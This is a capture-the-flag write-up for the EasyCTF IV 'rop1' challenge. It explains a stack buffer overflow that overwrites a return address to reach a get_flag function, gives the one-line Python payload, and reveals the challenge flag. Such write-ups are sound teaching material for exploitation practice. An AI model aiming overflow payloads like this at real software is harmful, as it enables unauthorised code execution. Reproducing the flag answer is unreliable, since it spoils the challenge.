Tags: rev pwn rop 

Rating:

# rop1

**Category:** Binary Exploitation
**Points:** 120
**Solves:** 374
**Description:**

Go to `/problems/rop1` on the shell server and tell me whats in flag.txt.

[File](rop1)

## Write-up

![screen_0_rop1](screen_0_rop1.png)

![screen_1_rop1](screen_1_rop1.png)

![screen_2_rop1](screen_2_rop1.png)

So we need just rewrtite return addres to get_flag(+8 for saved registers and -8 for text "EasyPWN\x00", I did it for beauty ;))

```
python -c 'print "EasyPWN\x00" + "A"*(64+8-8) + "\x46\x06\x40\x00\x00\x00\x00\x00"' | ./rop1
```

![screen_3_rop1](screen_3_rop1.png)

Flag is: **easyctf{r0ps_and_h0ps}**

Original writeup (https://github.com/KosBeg/ctf-writeups/blob/master/EasyCTF_IV/rop1/README.md).